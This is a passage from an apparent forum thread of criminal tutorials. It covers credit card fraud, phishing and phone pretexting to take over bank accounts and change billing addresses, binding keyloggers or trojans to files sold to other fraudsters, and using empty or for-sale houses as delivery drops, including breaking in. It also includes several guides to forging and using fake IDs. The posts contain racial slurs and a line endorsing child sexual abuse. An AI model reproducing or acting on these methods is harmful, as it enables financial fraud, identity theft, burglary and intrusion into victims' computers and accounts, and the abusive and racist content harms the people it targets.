+"undernet". +Fellow carders don't like revealing their IRCs, and for obvious reasons. + +My advice is find a scammer through e-mail, and chat to him; be witty with it but be respectful to a fellow +fraudster. +Vendors and how to approach them +Vendors are the people in IRC who are selling and providing the services for you. There are certain ways +you should speak to vendors otherwise they're going to rip you (remember this is the black market, this is +just like going up to a random drug dealer in the street and not knowing what you really want or what +you're getting into; you'll get ripped off). Ask as many questions as possible of what you want to know, if +you're buying a CVV2 ask to see proof of their details working (get them to make a small purchase +somewhere; they should show you a before and after and the limits that are there on the card [there are +methods out there of checking your balance; you can even get it through text/sms]. This is a market so +remember there are more people that will be willing to buy from that vendor, it's open for all, you can get +a full load of info including dumps for as low as £3/$5, drops usually go for £7; if someone is saying +higher prices don't be afraid to haggle down to these prices or a little bit lower. COBs go for a little bit +higher in ranges of £15-£20 because the vendor needs to get full info on someone and then change the +billing address through the bank to where ever your drop is. +Now when you go in the channel don't fucking say or request anything, shut up and see what the vendors +are saying they have to offer and then send them a private message and talk to them. If any "vendor" +messages you 1st trying to push onto you to buy from them then they're most likely a ripper; however +don't piss off the rippers or assume someone is a ripper because you never know who is going to be there +to help you out later on down the line or who might be pissed off enough to fuck you over. +I can't give any big advice on not getting ripped in IRC because you don't personally know anyone in +there at all, you just have to take your chances (expect to get ripped your 1st few times going in there, just +don't go to them again, because if they get away with it once they'll definitely try again if you go back to +them). +DO NOT BUY ANY WU BUG(Western Union Bug); it is a massive ripper technique which is bullshit. +The WU BUG used to work but was patched a looong time ago, most of the time now you'll get nothing +or you'll end up with a rootkit on your comp. Rippers always say ridiculous prices for these too such as +$200+; but if someone says lower prices it's still bullshit and most likely a rootkit/trojan/keylogger going +to be installed on your machine while you get some useless program that does nothing. +Ripping +Easy as hell to do, not much photoshop skills needed really either. +Bullshit and say you're selling full info (you're getting the info from fakenamegenerator.com or any credit +card gen program; of course they don't fucking work), if they want to see proof just use your own legit +CC or another stolen CC to buy something and show them proof of you buying it, except photoshop the +details to that which you're going to be giving him later. Take payment through Western Union ONLY +(since e-gold isn't around anymore), then just send him the bullshit info. +If they want the report to go to their phone via SMS then just spoof a text with an sms bomber saying +some bullshit reports. Then get the payment via WU. +To get victims you message them 1st, message out in the whole channel 1st and then PM random buyers +(look for ones requesting). +::::WU BUG:::: +seriously this is bullshit, all people are doing are showing buyers fake screenshots made in PS or are +actually making quick programs themselves and taking screens of them and then selling them, although +essentially they're useless. You want to do this, but you want to actually send them a file as well, but bind +a keylogger or trojan to it; not only can you rip them out of their cash to buy your infection but the info +you get from spying on them will be so much more as well ranging from their info to other stolen CC +info, you'll have a backdoor on what they do and can exploit it. + +If you can't be bothered making fake screenshots then get them from other rippers trying to sell them, get +them to show you pics, vids and info; then use it for yourself and rip some n00bs. +The following users say "It is so good to hear it!": +Phishing for Change of billing +A billing address is the details used for a person's bank account and most often their credit cards and +everything else too, this includes their phone number too. +What a change of billing (COB) is in a nutshell is changing the billing address registered to the card to +your drop address you're gonna be using. When you want to card BIG at various online websites the +orders will look more legit that you're not sending it else where other than the one registered to the card +(obviously after you've changed the billing address), meaning the delivery of your goods will be quicker +and will require a lot less verification. +Most of the time you change the billing address over the phone but SOME banks will let you do it online; +when you phone up to change it you use spoofcard.com or the pay as you go mobile phone you're going +to be using when carding, or beige boxing +When changing the billing address you need to know as much info as possible about the person's billing +address you're changing, because the bank is going to ask you 3 security questions you set (such as +mother's maiden name) before they change it. +You can phish for details over the phone (see the phishin over the phone section above), however it's best +to use keyloggers and phisher pages for this with a MIX of over the phone. +Use through phishing pages +2 methods here, 1 including over the phone, one isn't. +The method without the phone is to just send a ton of e-mails out to random people and send them a html +e-mail telling them they need to update their information before the account is suspended or their account +with the bank will be cancelled, you have them go to a phisher page off the template and the phisher +pages "requires" them to answer security questions like their mother's maiden name, their pet's name, you +know those type of questions. +Another method is to call them up pretending to be the bank and saying there have been different ip +ranges logging on their account and they need to confirm their details online, link them to the phisher +page and have them fill in the details; have the phisher page redirect to the actual online bank's login +page; then ask if they've done that over the phone, tell them to wait a minute while you confirm and check +it all out, say it's all clear and tell them to log in, they'll think nothing of it and you now have the answers +to their secret questions which you can give to the bank itself when you go to change the billing address. +Use through keylogging +This is my favourite method and what I told S_E last night in IRC. +You have a hardware (or software) keylogger set on someone's comp, use sock proxies when logging into +their online bank account and then change their password, call them up pretending to be the bank and then +get them to go to the actual online bank link and fill in their forgotten password options (answering secret +questions) or of course get them to go to your phisher page and fill in the details (this is if you want to +add more fields to get more info) then pretend to be checking it all over, then change their password again +to some random letters and numbers and give it to them to log back in (it doesn't matter because they're +keylogged and you'll get their new login if they change the password again anyway), you'll have all their +info logged down too for you to answer your questions when you call the bank. + +Best time to do all of this is around the 10th day of the month (people usually get their credit reports at +the start of every month), this will give you plenty of time to card enough for the remaining days until +they see they're not getting their reports coming to them anymore (if you're crafty you can pretend to have +cancelled the online bank account for them after they've gave you the info you need to know; I used to do +this method and keep it going without them knowing). +You need as much info as possible when calling up the bank to change the billing address. +Drops and what you need to know about them +Drops and what you need to know about them +What drop locations are and what they’re used for +Well simply a drop location is an abandoned house, or any house that is not under your name or any of +your details. You can lead young children into these to make a sexy time with them, get items delivered to +them that you want no one else to find about or risking finding, or just use it to squat in if you have no +where else to go. Basically they are used in ways of keeping your nose clean and are used by mostly scam +artists and sex offenders. +How to find a drop location +There are many ways of finding a drop location for use, whether it temporarily or permanently (although I +suggest swapping and changing locations because my main last one I used got raided or broken into and +is boarded up and too hot to use); I will suggest 3 ways on how you can find some for you to use. +One final tip is don’t bother going for houses that are boarded up at the front where it is visible to passers +by (it’s okay if round the back is boarded up) +Way #1 +As just mentioned you can go about it many different ways but one of the ways the way I prefer to go +about it is you should be looking around some older housing estates and more ghetto areas (could also tie +in with the sob story you feed to a paedophile/child predator you are possibly scamming). For example in +Derby there is an area called Sinfin, but now there is 2 parts to it and they are New Sinfin and Old Sinfin. +Old Sinfin is the are you would want to go to, because it’s older it’s most likely to be alot more houses +abandoned or deemed unsafe (it’s bullshit). +Or if you were lucky like I once were then you could ask around your mates if there are any empty houses +in their area. If there are then you’re in luck and can even have your friend keep tabs and watching over it +for you and give you details so you can keep it all under wraps and safe. It may be alot riskier with +neighbour hood watch morons, and nosey neighbours, but it’s still ideal and a little bit less suspicious +than the abandoned houses in the older estates, and this is because the older estates usually have all +abandoned houses close by, where as the odd one out covered with a street filled with inhabitants will +seem less suspicious to the postman. +Way #2 +Now this is a temporary way of finding a drop location, but is sometimes an effective ways and means of +getting what you need but has a bit more risk to it; and personally is a way I have never used even till +today. +Have you ever been eavesdropping on a conversation between a neighbour and one of their family +member’s or friends’, or been down the pub and heard the common as muck chavs boasting about a +holiday they are going away on for however long they say they’re going away for? +Well listen out for these type of conversations. Because them away on holiday means the house is most +likely going to be empty for however long they’re going away for. So if you already know where they +live then that’s great the job is made easier; if you know their first name and surname then look them up +in the phone directory and find their address to go along with the number. If you don’t know where they +live, or their name then just listen out to see if you can hear their names come up in conversation; just +remember that if it’s in the pub it’s most likely local to it that they live, so you could easily find out by + +following them home and seeing. +Way #3 +Possibly the safest, easiest way of finding, and quickest way to get a drop location. +Most areas have houses up for sale am I right? +Or houses that are up for bidding on, am I right? +Well they have a website with a full list of your local area(s) that have houses up for bidding on and for +sale. +For example I would search Derbyhomefinders and look at the list on their site. +All of these houses are empty and often do not have a sign up outside them either (if they do then just +take it down and hide it somewhere for the time being). +The advantage to using the lists to find the drop locations to use is it will usually say when the bid is up or +if the house has been sold (this lets you know that it will not be ideal to use that certain house now it’s +most likely to be inhabited) and will have the houses on there that are still being bidded on and that are +still up for sale, these are the ones you want to be using. +The best thing about this though is that you have a full list of many different drops to use (like I said +earlier it’s best to switch drop locations and use many different ones) and it is updated with new ones +coming up and tells you full which ones are over and not usable. +You just need to know your agencies for housing and find their website. +Obtaining and using drop locations +You’re probably thinking now I’ve got/found one that’s great and everything but how the fuck do I keep +it a secret? +for way 1 +this much is obvious that you do not tell anyone except your partner if you’re doing a team bait, and 1 +trustworthy friend to keep tabs on it if you are doing a bait on your own, and also the paedophile, but only +when he asks. But there is alot more to it than that, also maintaining your abandoned house and making +the postman think someone living there. +Appearance isn’t everything at all in any case and it isn’t for this either, but of course you try to make +yourself look as best as you can. The same principles are applied to keeping an abandoned house; you +should atleast try to get a new lock put on the door which you will also have a key for; just so that if any +druggies go there before you then they will have a tougher time getting in (of course it’s ideal you don’t +get somewhere known to druggies but this is an example of what use it could have) but also if there is a +fucked up lock on a door then it’s pretty damn obvious only low life scum or some criminal(s) are using +the place, so buy a new lock for the door and get it fitted on, whether you do it yourself or get assistance +from a friend who knows what they are doing. +Now as for overgrowing plants and weeds, you can only do so much without being suspected. Do not use +a lawn mower, use clippers and hack it as short as you can. It’s best to get all of this done when everyone +is at work during the day time; but in reality it isn’t ideal at all and most criminals don’t tend to bother +with this. Instead they will make it seem someone is in but is just too ill to do anything with the garden or +is just a lazy fucker. They do this by often writing up a note and sticking it to the door or leaving it on the +floor near the door saying something such as "No milk today please" or "Not in, please leave packages at +post office". +Write a few letters to yourself aswell ready to come on the same day as the parcel, this will make it look +like you get mail and not just the one off suspicious package now and then. + +Now 2 alternatives, you can either get to the abandoned house and take the mail from the mailman while +acting like you live there (you must look the part as lazy or disabled if you have ingrown plants in "your" +garden) or you can leave a note saying to take any packages to the post office for pick up because you are +at work or something along those lines. +One final rule is do not be in and out of the hideout everyday or whatever, visit probably 2 or 3 times a +week. +Way 2 +Now there are 2 ways to go about this; you can either just get to the house early in the morning a little bit +just before the postman arrives and be at the house outside pretending you’re just about to leave and then +sign for the package (if you need to) and collect it off the postman and then be on your way after he’s +gone. Or if you’re good at bypassing alarms (I have a guide on burglary) or the house has no alarm then +you could bump key in at night time (not recommended) or during the day time the day before when +everyone else will be at work aswell, and hide out there for a bit (hell even take some food that is left in +the fridge and feed yourself since you’re spending the rest of the day and early morning there). Basic +rules are don’t have tv on too loud if at all, or if you do then put head phones on into the tv if it’s that old +of a model, and leave everything how it was left an say upstairs so incase any neighbours or anyone +looking after the house while the owners are away come in then you have time to hide. +Obviously if it’s a package you don’t have to sign for then you can stick up a note on the door early in the +morning before the post man comes saying to leave it round the back or what ever excuse you wanna +make up. +Way #3 +Easy, just as previously except you don’t have to be as cautious and often the alarms are disabled for that +time being anyway so you don’t have to worry as much if you bump key into it. +As also stated previously in this guide, if there are any up for bidding/for sale signs then take them down +and just get them out of the way. +You can even go to this one the night before instead of day time because no one is hardly going to be +watching over this unless it’s in a neighbourhood watch area (in which case you chose the wrong area +anyway, you dumbass). +Some basic tips to keep in mind +-- Be there before the postman! can’t stress this enough, it’s too fucking obvious if you’re late. +-- When signing for packages, if you need to, then sign a fake signature (the sig can be any made up fake +shit) with your hand that you don’t write with, so it’s harder to trace incase things go tits up later on down +the line. +-- Take anything in any guide with a pinch of salt, things may be different circumstances for you and your +situations; guides are to be used as basis’s. +The following users say "It is so good to hear it!": +CC scan tutz: +Code: +http://www.zshare.net/download/51706978a8180d65/ +http://www.zshare.net/download/51707169cc576e5d/ +Also will say the main reason we use SOCK proxies: +Sock proxies can receive and send most types of internet traffic such as e-mails, java, flash etc; sock +proxies are more private as well and much more secure. + +Socks traffic is anonymized as it is sent out and the incoming traffic is filtered. +You can run most programs through SOCKS easier as well. +Bear in mind it's wise to disable java, and flash and have your cookies cleared before and during use of +the proxies as they can reveal your identity. +Disable Javascript, until you need to use it (usually when submitting info). +You can find socks(5) proxies online, scanning them to see which ones are still high in anonymity and are +working is done through certain scanners you find online. +I use accessdiver to check all my proxies from the lists I got. +If I ever get a log in for anyproxy again (if I decide to start carding again) then I'll be sure to share some +lists sometime. +Infact you can actually buy them off the anyproxy.net website, except they're cheaper in IRC. +An extra tip about drops: You can order it to any address you want really, call them up saying they got the +address wrong and are sending it there instead (say you live on a street that sounds similar to theirs), ask +if they can sign for it and keep it ther euntil you can pick it up after work. This is the best method. +Also bear in mind about instore carding for the UK, becaus eof chip and pin it's ALOT harder to skim +ATMs, you have to use the old ones that are in some paki shops. They're hard to find but they do still +have them in places. For an example of what atm type I'm on about search for the skimming vid that The +Real Hustle did. +---------- Post added at 08:12 AM ---------- Previous post was at 08:09 AM ---------- +I think I should add the updates I posted in another thread in this one as well, it's some need to know shit. +Nothing in here is outdated, but this is additional needed info. +Carding isn't so easy unless you have full details and get them all changed, even then they may bring up a +red flag, it depends on the site you're carding. +To be easier for example I'd card people who live in the same country as me only, just to make the job +easier. Why? IIN/BIN is one of the first things they check now. Unless you steal all of their details and +call up the bank and tell them you're going "abroad", otherwise all transactions would just be stopped. Get +the COB address changed also, obviously this still is absolutely needed to be done to avoid the top red +flag. In that case it'd be only good for instore carding and if you'd phished the pin from them, or if you're +buying from IRC get full info. +Simple way, keep it to your only country and you'll have less work and trouble coming your way. +If you're going to card then card big, but not the most expensive thing in stock obviously, don't fuck +around with multiple small purchases. +Identifying the place the card was issued from can be done through various methods; +http://binbase.com/csv.php?module=search +http://www.binchecker.com/ +2 to name a few. + +This will help you pick out the phished cards and which ones are of use to you. +---------- Post added at 08:13 AM ---------- Previous post was at 08:12 AM ---------- +Ok back on topic folks, carding right wanna do it?? +Don't think it's as easy as getting a hold of a cc, going to dell.com and ordering a 1k laptop. It's not gonna +work buddy. You need to find the best method to outsmart the merchant, they know all about this kind of +fraud and they suspect it in many ways. Common sense is your best friend. Would it make sense if the +'real' owner of the card orders 1k worth of electronics to an out of state random house. Sure it's possible, +but they're not gonna buy it. First thing that's gonna happen is check the purchase, most likely the +cardholder is gonna get a call from the bank but the transaction had probably already been canceled +before this even happened. Why?? Because they know. It's your job to start researching on how to card +successfully but I'll give you some tips for online carding. +AVS +There's a neat little trick, they only check numbers. So let's say the card owner's address is 673 W Dook +st. You can find a drop that is 673 S. Dr Avenue. This will pass the AVS system. +COB'S +Means change of billing. There's a couple of ways to do it, online or by phone. Alot of banks only need +ssn and dob so a lookup for them will sometimes do it. A little advice is do not card 2k 3 hours after you +changed the billing. Wait about 3-4 days or maybe a week. Common sense buddy. +BIN (bank identification number) +keep logs of them, you found one that made you 5k?? save it and get it again. This is one of the most +important things in carding and make sure you keep the gold to yourself. +Western Union +Yes it is possible, but it's a pain in the ass. You need to try and try...and keep trying til you discover the +treasure. Make sure you get good credit reports. +I'll tell you one thing though, USA cc suck ass. I recommend the good one's Germany, Denmark, Sweden, +Greece. But some USA bins are still good just look. +---------- Post added at 08:15 AM ---------- Previous post was at 08:13 AM ---------- +I just thought I'd add some more stuff about instore carding because someone I know had an error pop up +on one of his cards today because his dumpz on one of the cards had died. This isn't usually a problem +because this person used to skim for his own when it was easier, but now he buys them from IRC instead. +When you buy dumpz from vendors and are a regular carder there will be times you're carding instore and +have errors come up at the point of sale. Now because he chose a dumb nigger cashier this was easier to +get out of, so keep in mind to go for nigger cashiers, younger people and dumb women. +He got the worst error come up, which was "call for authorization". Now you do not want them to do this +at all, so you should make it clear you don't have much time for this, tel them you'll call the bank +tomorrow and ask them to try another one of your cards. There are many other excuses as well but this +was the one the person I know used. You must pu your hand out as if to insist you want the card back +whilst talking to them, most of the time they won't know whether to give it you back but will give it you +back when put on the spot. If you don't have another card just say you will call the bank about it and +come back tomorrow. +The key to this however is to remain calm. Then give them another card. + +Another error is "declined". You'll get this eventually if you have good dumpz on your card, the limit has +to end somewhere (get a good IIN to make more money). Before hand you should make out you're not +sure how much money is on the card "I hope I have enough money to cover this", or when it's declined +just stay calm and give them another card and tell them you think the limit must be gone on that one, you +had a feeling that was going to happen; laugh it off. If you don't have another card on hand say you'll be +back soon and you're going to the cash point. +There's many other merchant error codes and I won't cover them all (I linked to them in another thread +somewhere when kirby was mod) but once you have practice bullshitting with these errors you'll begin +getting good at it, it's all pretty much the same action you should take anyway. +Now you're probably thinking if you have the PIN as well then why not just cash out at the cash point and +then pay in cash? You can only draw out £300 within 24 hours most cards. +Also if you're carding expensive goods then have some other ID which matches the name on the credit +card, they'll ask for this majority of the time if it's expensive goods. Sometimes the guy I know has been +able to get away with just having a fake business name tag ID whipped up. This won't wash if you're +carding rolexes or gemstones. It's best to have another form of fake ID like a driing licence or something +like that. +---------- Post added at 08:16 AM ---------- Previous post was at 08:15 AM ---------- +COB'S +Means change of billing. There's a couple of ways to do it, online or by phone. Alot of banks only need +ssn and dob so a lookup for them will sometimes do it. A little advice is do not card 2k 3 hours after you +changed the billing. Wait about 3-4 days or maybe a week. Common sense buddy. +BIN (bank identification number) +keep logs of them, you found one that made you 5k?? save it and get it again. This is one of the most +important things in carding and make sure you keep the gold to yourself. +Western Union +Yes it is possible, but it's a pain in the ass. You need to try and try...and keep trying til you discover the +treasure. Make sure you get good credit reports. +I'll tell you one thing though, USA cc suck ass. I recommend the good one's Germany, Denmark, Sweden, +Greece. But some USA bins are still good just look. +He's right about the COB. It takes a while to change now, so get it changed as early into the month as you +can, the 8th or 9th is usually good enough for the guy I know. +IINs are the most important now indeed if you want to make a good profit and not get busted by limits. +UK IINs aren't that bad but the best ARE germany, spain and Turkey from what I've seen so far. +I've got a huge list of IINs which I'm a little reluctant to share. +As for Western Union I've heard you need a lot in a lot of countries but in the UK it's not too hard at all. +Get some sock proxies and make an account online. Add the card details and +the receivers details then go through the process. +If it all goes well they give you a MTCN (money transaction control number). +Call them up to confirm and answer their questions about why you're sending the money and if you know + +them. I usually give the excuse that I'm a job agent and it's his weekly pay. They ask other qustions like +your D.O.B (this is why you need to be good at phishing or make sure you're buying fullz). They'll also +ask the name of the bank that issued the card, so see the BIN/IIN checkers I linked earlier. +I've heard of some people being asked if it's their first time making a transfer through WU from credit +card. This is what catches you out or confirms the whole thing; just say yes, it's a 50/50 chance. +Then go to a WU agent with fake ID of the contact details you gave of the reciever, or if you've got a +trustworthy person to pick it up then give his and get him to pick it up. +The shit thing is you can only send £100 each transaction and only £600 a month. That was with a UK +IIN, I'm not sure if it'd be different with another card. +Western Union is good for cashing out but it's not worth all of the stages and there are tons of easier +ways. +Novelty ID Guide +Counterfeit ID Cards +These are licenses that are completely different from the actual valid license. They may be designed to +look "official" or they may follow a familiar, earlier license style. +Altered ID Cards +Additions and changes are often made to an actual, valid license, or a photograph of a valid license. This +type of technique is used by minors for liquor purchase , by credit card defrauders who need supporting +IS, and others involved in identity change efforts +Forged ID Cards +When alterations are combined with forgery of the license (usually adding a new photograph), fraud can +be detected by checking for raised edges around the photograph, unauthorized lamination, a broken or +partial signature and missing or partial state seals at photo edge. +=============================================== +Fake ID Guide--All you ever wanted to know but were afraid to ask +article by DrNick +So you want to get drunk this weekend. Or buy some cigarettes. It is sometimes easier to buy marijuana +and take advantage of the black market brought on by the War on Drugs. Or, follow on and learn how to +kill your brain cells with alcohol. +*** +Table of Contents +I. Disclaimer/Legality +A. Getting ID +B. Making your own ID +C. Buying ID +D. Using the Fake ID + +*** +I. Disclaimer +Fake ID is both a state and federal crime. If caught you might not be charged with both, but who knows? +Usually making a fake ID is illegal in many states. It is usually a crime to alter existing state-issued ID, or +to create a new fake ID. These crimes include forgery and fraud. They are no fun to get charged with. +This site has some more info on it, it is a good example and food for thought: +{hxxp://www.colorado.edu/sacs/ralphie/a/Appendix_B,_Alc.html} +Using a fake ID to purchase alcohol or cigarettes is some sort of crime. These crimes all differ from state +to state, so check your local laws. I do not advocate creating a fake or fraudulent id. This information is +for informational and novelty use only. Do not break any laws. This is not intended for anyone evading +prosecution, warrants, etc. I will not hinder prosecution. I do not know how to create a new identity. +*** +A. Getting ID +You can make it yourself or buy it. Some texts you might read talk about birth certificates and death +certificates and all that crap. There are some links included which will take you there. This phile will help +you make your own ID. This ID is intended primarily to get you into bars and help you buy beer. Don't +even bother trying to fool a cop or fed with it. +B. Making it yourself: +You will need a various combination of the following tools, but these are just guidelines. You should try +experimenting with different combinations and seeing which one works best for your ids! You can +probably find all you need here at Staples or your local stationary store. +1. Computer (if you don't have one just forget it) +2. Color scanner for computer (or access to a friends) +3. Color Printer (hardcore=die-sub printers, for home hacking try Epson 400, 600, 800 series) +4. Software--Adobe Photoshop, Paint Shop Pro +5. Cutting Tool: Exacto Knife (preferred method) or really sharp short blade on Swiss Army +Knife (used to cut out the printed id from the rest of the paper) +6. Adhesive: Strong Glue Stick or Double sided scotch tape (experiment here) +7. Posterboard or Manila file folder or Metrocard (strengthens the card--experiment here) +8. Contact paper (optional use only to get the right "look" or "feel") +9. A pencil +10. Paper to print front of id on--high quality inkjet or photoglossy depending on id. Don't even +bother with copy paper. +11. The ID you want to fake (whether it be New York, Connecticut, LILCO, or NYNEX) +12. Nail File (for smoothing ID's edges). +Also you might want to try 3M id cards. They come 2 to a sheet. Experiment. +How to Make it: +1. You need an ID or a template. You need to know what the legitimate 21 year old version of the ID +looks like. Its good if you have a legit ID on hand to compare yours with. Check the "{The I.D. Checking +Guide}" (hxxp://www.driverslicenseguide.com/) as an invaluable reference tool. It is a great book worth +the order. If you need to scan in your own picture or ID make sure it is very clean. Use a high resolution, +720 DPI is good. You must use at least 24 bit resolution. Making your own template is as easy as +recognizing the important information on the id and how to correctly present it. +2. Follow what the template says. Put the picture in the right place. Fill in the right blanks. + +3. Find a good medium to print on and work with. Remember you are going to need a front and back for +this ID. I have seen fake NY State Ids using recycled Learners Permits. The new fake front is glued on +top of a learners permit so the back is the same. Sometimes though you don't have an old license around. +If not then scan the back of the drivers license and print it out on posterboard. Use the posterboard as the +back. Its not perfect but close. Again, you are encouraged to experiment and see if you can find +something better.. This is part of the process and helps you stay on your game as an artist. +4. Print the front out. Use a high quality paper, photo glossy is not necessary and is sometimes too thick +or glossy for the job. Depending on what ID you are imitating you may or may not need a laminating +surface. +5. Use a glue stick or double stick tape to adhere the front of your ID to the back. +6. Trim the corners with the knife (if necessary). If necessary you might want to use a nail file to smooth +the edges on the ID. +*** +C. Purchasing Fake ID +If you live in a big city (ie: New York) walk down to the business districts (ie: Times Square, Eighth +Avenue, W. 47th Street) and you can find some shops. I am not 100% sure as I have never done this +myself but my friends have. Look and listen. In New York you can sometimes buy fake ID in the back of +luggage shops. Weird but true. It is often some fake looking out of state or some bad college id, but see if +it suits your needs. Most of the net is full of crappy novelty ID, nothing to buy beer with. Info on the net +will help you make your own. +*** +D. Using the ID +So, you finally got an ID. One that says your 21 or 18 or however old you need to be to buy items (to +exercise your property rights!). So, now that you've invested $20-$100 you're all set, right? Wrong! If you +were I wouldn't waste my time by writing this, or make you read it. This is free advice. Take it. Kant says +the only right acts are those with good intentions. I try. +Don't consume alcohol in public where doing so is prohibited by law (ie: on the street). This is because it +is illegal and when some cop finds out you are not only drinking on his streets but not even twenty-one he +will throw a fit. Save yourself the trouble. +If your ID is successful or not depends on many things. Some are beyond your control, such as the club's +policy on fake id. Some are within your control, such as how you present yourself and what you exude. +Factors beyond your control: +The setting. Ie: the bar, restaurant, store. Hopefully you can choose a place that is easily passable. +Possibly within your control: +Your server/bouncer. When in a grocery store DO go towards the 19 year old cashier. The younger ones +usually care less about this whole ID thing. DO take advantage of the Korean/Pakistani Immigrant grocer. +In the midst of all of Guiliani's Law and Order crackdown my friend at NYU can still buy his Coronas +quite easily. The immigrant clerk questions my friend "Id?" To which my friend replies (with a smile) +"Yes ID." Your biggest friend is your great personality. Look happy and confident and you will walk +away with the beer. DON'T PANIC! +What you can do: +Know your fake birthday, name, address, zip code all that info on the card and your Zodiac sign. Go to a +place that has accepted your ID in the past! This is my best advice. When waiting on a line for admission +to a club have the ID ready--be confident! When you are purchasing at a grocery store or take out place it +is nice to have it ready to present to the cashier. Try to view it as a formality that you are accustomed to +engaging in. You are used to getting carded...remember? +In a restaurant chances are about 50/50 you will be carded when ordering from a waiter. If you are with + +your parents these odds decrease, with your friends these odds increase. However I have been denied in +older company and served with my friends. Lucky Chengs has been particularly lenient...of course in that +case you wouldn't even need ID. What can I say? I am only trying to help. +============================================ +How to build a fake College ID +article by Bishop +I. Introduction +A Fake ID is realitively easy to make. In this article I will teach you how to build a fake College ID. +College ID's are much easier than a drivers licence, becuase of the +number of colleges. As long as they have your Date of Birth you'll be ok. It will be approx. $75.00 +investment to buy the equipment. +II. Necessary Equipment +I have built many fake College ID's perfectly so stick to the recepie +GBC DocuSeal 30 -- Laminator +GBC Laminating Pouches -- Laminate Card (25 to a box) (Badge Card Size) +Bulldog Paper Slicer -- a cutting board and a slicer to make perfect cuts +New Razor Blade -- allways prove useful +Adobe Photoshop 4.0 -- Necessary Software +Ink Jet printer -- never use a dot matrix! (color optional) +Recent Photograph -- This will be a photo ID (wallet size) +A VHS tape -- ya' know the kind you put in your VCR +III. Using the Software +Make dimention of the card 3.5 inches wide 2.333 inches tall Now using text only put in the name of a +College one state away from you. Use only adverage colleges, not Yale or anything. Use Ariel Rounded +MT Bold for the name of the college. Then under +that use Calisto MT for the town the college is in. +-------------------------------------- +| | | +| Photo | Marywood | +| goes | College | +| here | | +| | Scranton, PA. | +| until the line | | +| | date / here | +-------------------------------------- + +The graphic above is a rough disription +Now you have the front, print out the card. +Next you have to give the card a back. +Make a new card with the same dimentions, +type the below using Ariel Rounded MT Bold +Birth Date: Height: Weight: +___________ _______ _______ +___________________________________ +print out the file +Use your Paper Slicer to cut out the card to the correct size. Then fill out the card +with the approate information. An existing card like a drivers liscence or credit card +can help. After both cards are cut out, get the badge card lamenate and insert both cards. Flip it over and +make sure you've done it right. Take out your picture and use the Paper Slicer to cut the picture out to the +size of the card and put it in place. Do not use any glue! Let the badge holder hold it in place. +Now get out that VHS tape and take it apart. Carefully remove tape and measure the exact width of the +paper card. Put the strip of film at the bottom on the Badge Card. It should look like a real card. You will +notice a tint / blur in the card. This is ok, don't worry. After it is centered and cut PERFECTLY!!!!! +put the card in the Leadered Carrier folder and make sure the stuff in the card doesn't move. Now plug in +the Laminantor, wait a minute and it be warmed up. Make sure the green light is on. Put the laminantor in +the on mode. Now slowly and carefully put in the folder adn laminate the card. Open the Carrier and take +out you new ID!!!!! +Please remember Fake ID's are an art NOT a science. +Try a few before you quit and, don't settle for an ID that has a flaw, Fake ID's are against the law! +IV. Getting away with it. +REHEARSE YOUR INFORMATION! assure yourself you know that you were born in +1978 or whatever year you need to be 18 or 21. I reccomend you keep the same name, height, weight you +really have. +============================================== +How to build a fake College ID #2 +article by Epi +Ok, so you just got a new ID and ya want something to go with it. College ID's are really simple and you +only need these materials: +1. Laminator (ya don't got it then I can't help) +2. Computer art program (i.e. adobe photoshop, I used Polaroid Photomax Pro and it works fine) +3. Butterfly pouches (10 mil) +4. 8-up teslin (or pvc card) +5. Printable transparencies +6. Inkjet printer (at least!!!!!!) + +7. A scanned card or template +8. The colleges logo +9. Colleges fight song +10. 3m glue spray (optional) +11. Passport photo +Ok, first, search the internet and get the logo once you do that, resize and place it in one corner +(depending on the template). change the colors of the lines one the id into the college's colors. put your +photo on and outline it with one of the college colors. Next, fill in all of your info (birth date, student #, +etc., whatever you think you need). +For the back, write the fight song on it and out it in the team colors. Some colleges use this, some dont, no +clerk is gonna know this unless they went there. To finish up the template, put any finishing touches on it, +its your choice. +Now that your template is finished, you hav a choice: print it out on the teslin or print on the +transparency. I'm not sure which works better, so sorry, your on your own for that. +Once you print it, just laminate with the butterfly pouch. If your laminator only says 5 mil pouches, most +will still laminate 10 mil, just run it through 3 times. The GBC docuseal will not, it bubbles. If you want +to make it look even more real put a holo on it or someting. I don't know of any colleges that have a holo, +but it just makes it look more real. +Good Luck!!! +============================================== +Who Are You? How To Be Someone You're Not +article by Bela_Lagousi +Fake IDs +Why do I need a fake ID? +You may be asking yourself "Self, Why do I need a Fake ID?" Well There are several reasons, the most +common being age. But there ARE other reasons. If you want an account at an Entertainment store you +need some form of photo ID, Want to check out the Pool balls at the Hotel, We need to see some ID. You +Get the picture. BUT if you can make a Fake ID you can keep the stuff. You can be 17, 18, or even 21. +Can't I just buy one? +Yes, you can! BUT there are ways that are Cheaper, Less Risky, More Realistic, and If YOU make them, +then you can sell them and make money! +Who Makes The Best? +Your local Tag Agency, you know the place where they make the REAL ones. Thats right you to can +have an ID that will fool everyone, EVEN THE COPS! How do you conveince them to make you a fake +ID?? YOU DON'T!! Simply go to friend of Legal age (If your 14 youll NEVER pull off 21!) and borrow +there Social Security Card and Birth Certificate This works in like 40 states IT WILL NOT WORK IN +CALIFORNIA! In California they require a fingerprint! +Want To Make Your Own? +Of course you do thats why your reading this Article!! This is a little more tricky. Here it goes... +THINGS YOULL NEED: +TEMPLATES +COREL PHOTO PAINT / DRAW + +PHOTOSHOP +TELETYPE FONT +TIMES NEW ROMAN FONT +A COLOR PRINTER (PREFERABLY LASER) +A SMALL PHOTOGRAPH OF YOUR SELF +AN IMAGINATION +1. Find a Template, always the hardest part. +2. Open your template using Corel Photo Paint or Adobe PhotoShop +3. Most of these Template don't already have any Text if they don't SKIP THIS STEP! +A) Select Draw start line and appropriate size (usually about 24) Erase the pre-recorded info +B) Proceed to step 4 +4. FONT! Use Teletype or some other font that resembles a type writer or Dot Matrix printer. THIS IS +VERY IMPORTANT! +5. FILLING IN THE BLANKS: Now for the Text THIS IS THE MOST IMPORTANT STEP! Use you +REAL height and Weight. MAKE SURE YOU LINE THESE UP EXACTLY!!! +6. NAME, ADDRESS, AND SSN. To generate SSN numbers I recommend a Carding Prom such as +Credit Wizard or FakeID.exe. FakeID is a better program but it IS NOT IN ENGLISH. Make up a +Birthday. DO NOT USE YOUR OWN INFO!! +7. PRINTING. Use as good a printer as possible this will take some time paper and ink to get the sizing +right size it to match your REAL ID. +8. The BACK. I don't have any back templates scan the back of yours or copy the text be sure to but +change the state names! +9. LAMINATING You will need a pouch laminator, but you don't have one and you don't have $2,000 to +cough up. GET A FRIEND AT BLOCK BUSTER! Or Use a Razor to Open your Block Buster Card and +insert Fake ID. +10. USE. THERE ARE SEVERAL TRICKS TO USING IT. +A) It werks best at night in not well lit places. +B) 